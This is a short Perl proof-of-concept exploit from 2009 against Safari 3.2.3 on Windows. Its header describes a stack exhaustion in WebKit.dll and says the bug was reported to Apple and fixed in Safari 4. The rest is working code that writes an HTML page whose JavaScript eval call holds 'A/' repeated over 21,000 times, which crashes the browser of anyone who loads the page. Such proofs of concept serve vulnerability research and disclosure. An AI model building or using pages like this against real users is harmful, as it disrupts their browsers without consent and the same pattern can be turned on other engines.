#!/usr/bin/perl
AKA
Safari 3.2.3 (Win32) JavaScript 'eval' Remote Denial of Service Exploit
Jeremy Brown [[email protected]//jbrownsec.blogspot.com//krakowlabs.com] 09.07.2009
*********************************************************************************************************
Safari crashes when interpreting a webpage that calls the "eval" JavaScript function with "A/" repeating
21526 times (43052 bytes). When triggering this vulnerability, Safari will throw a "Stack Overflow"
exception, and then an access violation when adjusting the trigger to "A/" repeating 21697 times
(43394 bytes). The problem originates in the module "WebKit.dll". Safari uses this module as part of the
WebKit layout engine (www.webkit.org).
This issue was reported to Apple several months ago and it looks like they fixed it in Safari 4
(4.1.2 tested) after recent testing. It has also been lying around the Fun Archive @ krakowlabs.com for
quite a while too. Btw, STACK_OVERFLOW does NOT mean there is a buffer overflow on the stack. It pretty
much means that the stack for the process has been exhausted and its maximum size has been reached.
*********************************************************************************************************
$fn = 'letsgosurfinnowwithsafari.html';
$size = 21526; # "Stack Overflow" WebKit.dll
#$size = 21697; # "Access Violation" WebKit.dll
$payload = '<html><script type="text/javascript">' . "\n";
$payload = $payload . 'eval("' . "A/" x $size . '");' . "\n";
$payload = $payload . '</script></html>';
open(FD, '>' . $fn);
print FD $payload;
close(FD);